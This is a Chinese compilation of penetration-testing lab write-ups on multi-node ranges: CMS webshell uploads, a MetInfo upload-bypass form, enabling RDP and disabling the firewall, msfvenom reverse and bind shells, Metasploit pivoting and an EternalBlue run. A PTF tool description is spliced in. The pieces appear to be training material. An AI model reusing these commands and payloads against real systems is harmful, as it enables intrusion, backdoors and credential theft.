目录
多节点靶场渗透
环境搭建
实验要求及已知信息
靶场网址
实验过程
信息收集
外网渗透
内网渗透

多节点靶场渗透
环境搭建

靶机搭建在vmware上，网卡为nat，攻击机为win10
物理机网卡vment8IP设为100网段

实验要求及已知信息

在渗透中找出三个flag
已知目标IP：192.168.100.130

靶场网址
https://pan.baidu.com/s/1xd8MdGwqZqErtvu0QO5d5A

提取码：xbb5
实验过程


信息收集

扫描目标IP，使用的是nmap
80端口开放，查看IP网站能否正常访问
目录爆破  	对目标IP进行目录爆破，这里使用的工具是御剑	



外网渗透


YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456




修改模板里index.php文件，写入木马


查看权限,发现是system权限，无需提权




上传pwdump,抓取密码


cmd5解析可得密码为Hallo


收集信息时可知3389端口未开启，使用命令开3389端口




查看端口是否被成功开启





内网渗透

尝试远程连接，发现第一个flag1{skjdfhksah}


信息收集，cmd命令查看IP，发现有两个网卡


打开桌面的xshell，发现有一个保存的会话，用户名为admin，IP为172.16.1.1


使用kali2019.1上的九头蛇爆破密码，可得密码为123456
在history中找到flag2{ajkhjkqwbm}
发现是admin用户，不是root，linux提权，上传定制exp

目录
多节点靶场渗透2
环境搭建
实验要求及已知信息
靶场网址
实验过程
信息收集
外网渗透
内网渗透

多节点靶场渗透2
环境搭建

靶机搭建在靶机搭建在vmware上，网卡为nat，攻击机为win10
物理机网卡vment8IP设为100网段

实验要求及已知信息

在渗透中找出三个flag
已知目标IP：192.168.100.130

靶场网址

https://pan.baidu.com/s/17KNdgTOBStnfE0MEYPP6lQ

提取码：0u6b

实验过程


信息收集

使用nmap扫面IP端口
80端口开放，查看IP网站能否正常访问
目录爆破 对目标IP进行目录爆破，这里使用的工具是御剑



外网渗透
metnfo5.0.4存在文件上传漏洞，为了方便这里写成html文件，上传之后文件路径是在该网站的upload/file/目录下

`<meta charset="utf-8">
<form
    enctype="multipart/form-data"
    method="post"
    name="myfrom"
    action="http://192.168.100.130/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp"
>
    <input name="Filedata" type="file" size=20>
    <input type="submit" name="Submit" value="提交信息">
</form>`



连接大马后，查看权限，发现是system权限，无需提权
上传pwdump，抓取密码，解析后可知密码为：a1b2c3
信息收集时注意到3389未开启，使用cmd命令开启


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f



开启后用netstat -ano查看端口


尝试远程连接失败，可能是防火墙的原因
查看防火墙是否开启


netsh advfirewall show allprofiles


关闭防火墙


netsh firewall set opmode mode=disable



远程连接，发现flag1{asdjqwndrr}

内网渗透

内网信息收集，查看IP，ie浏览器历史记录


尝试访问


用kali爆破ftp登录密码，发现是弱口令，密码是123456，登录后发现flag2{12k3j1kjcz}


从网站目录中发现后台登录界面为admin
查看网站目录配置文件，发现账号密码，尝试登录，失败
发现后台登录也是弱口令，密码为a1b2c3，登录后发现文件上传点


上传木马，看后台找路径访问


查看权限，发现需要提权
查看系统信息，上传相应的exp提权


端口转接，以777权限运行exp

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191122140902312.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NlZXIyMzM=,size_16,color_FFFFFF,t_70

拿到权限后ls查看目录，找到第三个flag3{gwbebrqweq}

The PenTesters Framework (PTF)是一个针对Debian/Ubuntu/ArchLinux开发设计的Python脚本，在PTF的帮助下，研究人员可以根据自己的需要创建一个专用于渗透测试的小型发行版系统平台。作为渗透测试人员，我们通常会有自己习惯使用的工具集或者/pentest/目录，与此同时我们也希望这些工具能够随时保持最新版本。
PTF会尝试安装所有你需要的渗透测试工具（最新版本），PTF会对这些项目进行编译和构建，并使它们成为在任何设备上都可以安装、更新和分发的工具。PTF还会简化这些工具的安装和打包操作，并为您创建一个完整的渗透测试框架。因为PTF本质上是一个框架，所以我们可以根据自己的需要来进行组建添加以及配置。
使用指南

首先请确保config/ptf.config文件中包含了工具及其组件的安装地址根路径，默认情况下，工具的所有组件会安装在/pentest目录中。配置完成之后，请输入命令“./ptf”（或“python ptf”）运行PTF。
运行之后，你将会看到一个MetaSploitesque风格的Shell界面，我们可以使用“”来查看可用模块以及所有可接受的命令。当然了，我们还可以使用“help”或“？”来查看完整的命令帮助列表。
PTF使用视频

视频地址：https://vimeo.com/137133837
更新所有组件

如果你想要安装或更新所有工具，请直接运行下列命令：
./ptf

use modules/install_update_all

yes

运行之后，将会把所有工具安装进PTF框架中，如果有工具已存在，它将会自动更新这些工具。
比如说：
./ptf

use modules/update_installed

这条命令只会更新你刚刚安装的工具。如果你只想安装漏洞利用工具，你可以运行：
./ptf

use modules/exploitation/install_update_all

这条命令只会安装漏洞利用模块，你还可以用这种方法安装任何类型的模块。
定制已安装的工具

你可以通过modules/custom_list/list.py文件来安装你所需要的工具，修改list.py文件后，你可以直接添加你需要安装或更新的工具。输入下列命令：
./ptf

use modules/custom_list/list

yes

此时你可以根据需要来配置模块，并只对特定的工具进行安装和更新操作。
模块

首先，进入modules/目录，该目录下会有基于渗透测试执行标准（PTES）划分的子目录，这些子目录中都包含对应的功能模块。当你添加一个新的模块后，比如说testing.py，PTF会在你下次启动PTF时自动加载这个模块。
下面给出的是一个模块样本：
AUTHOR="DavidKennedy (ReL1K)"

DESCRIPTION="Thismodule will install/update the Browser Exploitation Framework (BeEF)"

INSTALL_TYPE="GIT"

REPOSITORY_LOCATION="https://github.com/beefproject/beef"

X64_LOCATION="https://github.com/something_thats_x64_instead_of_x86

INSTALL_LOCATION="beef"

DEBIAN="ruby1.9.3,sqlite3,ruby-sqlite3"

ARCHLINUX= "arch-module,etc"

BYPASS_UPDATE="NO"

AFTER_COMMANDS="cd{INSTALL_LOCATION},ruby install-beef"

LAUNCHER="beef"

TOOL_DEPEND="modules/exploitation/metasploit"

模块开发

模块中所有的参数都很简单，我们可以使用GIT、SVN或FILE，然后直接填写依赖项和安装位置即可。PTF将获取Python文件的位置，并将其移动到PTF配置中指定的位置。默认情况下，PTF会将所有工具安装到/pentest/PTES_PHASE/TOOL_FOLDER目录中。
当然了，我们还可以通过设置{PTF_LOCATION}来指定PTF安装路径。
After_Commands

通过设置After_Commands，我们可以设置工具安装完成后需要执行的命令：
AFTER_COMMANDS="cpconfig/dict/rockyou.txt {INSTALL_LOCATION}"

自动化命令行

我们还可以通过运行下列命令来自动化更新所有工具组件：
./ptf--update-all

无人值守运行

如果我们想要完成PTF的自动构建，我们就可以使用一个heredoc，这样我们就可以不用跟PTF进行交互键入了：
./ptf<<EOF

use modules/exploitation/metasploit

run

use modules/password-recovery/johntheripper

run

EOF


http://www.45zq.cn/portal/article/index/id/186.html

原创：锦行安全平台部zy

近年来，攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜，攻击者在经常会企业的内网进行横向渗透，令防守方防不胜防。因此，我们应该严格控制好网络区域之间的访问规则，加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供，旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。
一、实验简介
网络拓扑图



渗透机：win10+kali
第一层靶机 (外网web服务器):  Linux
第二场靶机 (内网web服务器):  Linux
第三层靶机 (内网办公机) : win7

用三层网络来模拟内外网环境,主要了解MSF、内网转发等
二、环境搭建
1、第一层网络

把渗透机kali和win10网卡1设置选择VMnet1：


靶机Linux网卡1设置选择VMnet1，添加网卡2 设置选择VMnet2：


2、第二层网络

将第二台靶机linux网卡1设置选择VMnet2，添加网卡2 设置选择VMnet3：

3、第三层网络
将靶机win7网卡1设置选择VMnet3：


再配置好各台机器对应IP即可
4、在第一台linux和第二台linux上搭建一个php上传页面，设为存在文件上传漏洞的web页面，以便后续的拿shell进行内网渗透
第一台linux


第二台linux


三、实验过程
① 第一层靶机

Win10访问http://192.168.85.131/  直接上传一句话木马


蚁剑连接





进一步做内网渗透，上传msf后门
打开kali msfconsole 输入

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf

生成一个名为mshell.elf的msf后门文件


蚁剑把后门文件上传到linux靶机


返回msf 开启监听

use exploit/multi/handler                        使用监听模块

set payload linux/x64/meterpreter/reverse_tcp      使用和木马相同的payload

set lhost 192.168.85.128                         kaili 的ip

set lport 4444                                  木马的端口

run                                          执行


蚁剑打开虚拟终端cd到后门文件的目录下,执行后门文件，输入

chmod 777 mshell.elf   加执行权限

./mshell.elf    执行文件


Kail接受到MSF会话


输入ifconfig，发现第二层172.10.10.0/24网段


添加路由

background      将会话转到后台

route add 172.10.10.0/24 1      添加 172.10.10.0/24网段 使用session1

route print  查看路由表


使用MSF建立socks代理

use auxiliary/server/socks4a

set srvhost 192.168.85.128

set srvport 10080

run


配置socks4代理的相关客户端Proxychains

在配置文件/etc/proxychains.conf中添加 ：socks4 192.168.85.128 10080

vi /etc/proxychains.conf


添加 socks4 192.168.85.128 10080


这样利用proxychains 启动的应用都可以带sock4代理，proxychains 为kali自带的，非MSF里的
建立好代理后渗透机可以通过这台linux当跳板机进入第二层网络
② 第二层网络

nmap探测存在web服务的主机

用proxychans 启动nmap对第二层网段进行80端口扫描，执行

proxychains nmap -sT -Pn -p 80 172.10.10.0/24
扫描发现55和56存在web服务，172.10.10.56 即为第二层网络的ip


由于proxychains无法代理icmp的数据包 所以必须添加-sT -Pn参数,即不检测主机是否存活,直接进行端口tcp扫描
脚本探测存活主机

在本地创建一个名为ping.sh的脚本

脚本内容如下：

#!/bin/bash

ip=“172.10.10.”

echo “ping log:” > ./ping.txt

for i in {1…254}

do

ping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl=” && echo “$ip$i [yes]” >> ./ping.txt || echo “$ip$i [no]” >> ./ping.txt &

done

echo “wait 5s…”

sleep 5

cat ./ping.txt

cat ./ping.txt | wc -l


Kali进入session 1会话，然后upload命令上传刚刚创建的脚本到靶机

upload /root/ping.sh /var/www/hrml/upload


进入shell执行

python -c ‘import pty;pty.spawn("/bin/bash")’

创建一个完全交互式shell，后

Chmod 777 ping.sh

./ping.sh

可以看到172.10.10.0/24 网段存活56.57两台

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oFyYbyiL-1598845763290)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-42.png)]
知道存活主机ip后就可以继续进入第二层内网主机
渗透机浏览器配置sock4a代理

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FSBtKHTX-1598845763290)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-3_2.png)]
通过代理可以访问第二层linux靶机http://172.10.10.56 同样上传一句话php1.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Z9jtIJah-1598845763291)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-28.png)]
蚁剑加代理连接

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Pp78n7J7-1598845763291)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-29.png)]
连接 http://172.10.10.56/upload/php1.php
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TJfYjZDu-1598845763292)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-30.png)]
进一步做内网渗透，继续上传msf后门
制作MSF后门

返回kali msf 输入

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf

生成 mshell1.elf 后门文件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9ZHoVL0U-1598845763293)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-31.png)]
因为在内网跨网段时无法反向代理连接到渗透的机器，所以这里使用linux/x64/meterpreter/bind_tcp 这个payload进行正向代理连接
蚁剑上传后门
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-R9O8DzFc-1598845763293)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-32.png)]
Kali开启监听

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UdMd5QCW-1598845763294)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-9.png)]
蚁剑打开虚拟终端执行后门文件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cdS6KXTX-1598845763295)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-11.png)]
返回会话


输入ifconfig 发现第三层网络的网段10.10.10.0/24

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-euNI5ycg-1598845763296)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-20.png)]
③ 第三层网络

添加路由

background

route add 10.10.10.0/24 2

route print
进入session 2 上传 脚本 探测存活主机

注意把脚本的ip段修改成该网段再上传

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-l1wMn4kO-1598845763297)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-43.png)]
探测到第三层网段的存活ip ：10.10.10.101

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BSzSM9q6-1598845763298)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-44.png)]
proxychans 启动nmap对10.10.10.101的1-500端口扫描，执行

proxychains nmap -sT -Pn -p 1-500 10.10.10.101

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IUrsbbNm-1598845763298)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-45.png)]
发现445端口开启

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IjgbZTNA-1598845763299)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-46.png)]
尝试使用ms17-010

use windows/smb/ms17_010_eternalblue

set rhost 10.10.10.101

set payload windows/x64/meterpreter/bind_tcp

set lport 4466

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8bKjew5x-1598845763300)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-47.png)]
Run ，存在445漏洞

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OljzefjF-1598845763302)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-48.png)]
执行成功，返回会话

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qgTYedrQ-1598845763303)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-51.png)]
开启3389远程桌面

run post/windows/manage/enable_rdp  开启远程桌面

run post/windows/manage/enable_rdp USERNAME=zzy PASSWORD=123qwe!@# 添加远程用户
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tSBmWj2U-1598845763303)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-52.png)]
将3389端口转回kali本地5555端口

portfwd add -l 5555 -p 3389 -r 10.10.10.101

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-O1PM9KGm-1598845763304)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-53.png)]
Win10远程桌面连接

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3JabxmaT-1598845763305)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-54.png)]
登陆成功

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-i4mdCe9u-1598845763305)(https://www.jeeseen.com/wp-content/uploads/2020/04/图片-59.png)]
结束